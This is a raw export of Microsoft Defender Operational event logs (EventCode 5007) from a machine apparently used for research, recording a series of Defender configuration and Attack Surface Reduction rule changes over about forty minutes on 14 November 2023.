OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0 11/14/2023 09:35:59 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=488 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 d1e49aac-8f56-4280-b9ba-993a6d77406c e6db77e5-3df2-4cf1-b95a-636979351e5b c1db55ab-c21a-4637-bb3f-a12568109d35 3B576869-A4EC-4529-8536-B80A7769E899 56a863a9-875e-4185-98a7-b882c64b5ce5 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c 26190899-1602-49e8-8b27-eb1d0a1ce869 D4F940AB-401B-4EFC-AADC-AD5F3C50688A 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 D3E037E1-3EB8-44C8-A917-57927947596D 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1 New value: 11/14/2023 09:35:59 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=487 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0 11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=486 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6 New value: 11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=485 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6 New value: 11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=484 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6 New value: 11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=483 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6 New value: 11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=482 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6 New value: 11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=481 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6 New value: 11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=480 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6 New value: 11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=479 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6 New value: 11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=478 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6 New value: 11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=477 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6 New value: 11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=476 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6 New value: 11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=475 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6 New value: 11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=474 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6 New value: 11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=473 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6 New value: 11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=472 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6 New value: 11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=471 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6 New value: 11/14/2023 09:35:55 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=470 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 d1e49aac-8f56-4280-b9ba-993a6d77406c e6db77e5-3df2-4cf1-b95a-636979351e5b c1db55ab-c21a-4637-bb3f-a12568109d35 3B576869-A4EC-4529-8536-B80A7769E899 56a863a9-875e-4185-98a7-b882c64b5ce5 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c 26190899-1602-49e8-8b27-eb1d0a1ce869 D4F940AB-401B-4EFC-AADC-AD5F3C50688A 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 D3E037E1-3EB8-44C8-A917-57927947596D 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=468 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=467 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=466 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=465 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=464 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=463 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=462 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=461 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=460 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=459 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=458 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=457 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=456 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=455 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=454 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6 11/14/2023 09:17:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=453 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6 11/14/2023 09:00:13 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=452 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1 New value: Default\ServiceStartStates = 0x0 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=451 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\Signature Updates\EnableUpdateResiliency = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates\EnableUpdateResiliency = 0x0 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=450 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\31 = 0x901 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=449 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\22 = 0x3E 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=448 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\_4 = 0x1 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=447 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\10 = 0x1 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=446 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\_9 = 0x1 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=445 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\32 = 0x36B0 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=444 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\_7 = 0x1 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=443 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender 11/14/2023 08:59:18 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=442 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\InstallLocation = C:\Program Files\Windows Defender\ New value: HKLM\SOFTWARE\Microsoft\Windows Defender\InstallLocation = C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\ 11/14/2023 08:59:13 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=441 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\ServiceStartStates = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ServiceStartStates = 0x1 11/14/2023 08:59:11 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=440 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\IsServiceRunning = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1 11/14/2023 08:59:03 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=438 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\IsServiceRunning = 0x0 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\IsServiceRunning = 0x1 11/14/2023 08:59:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 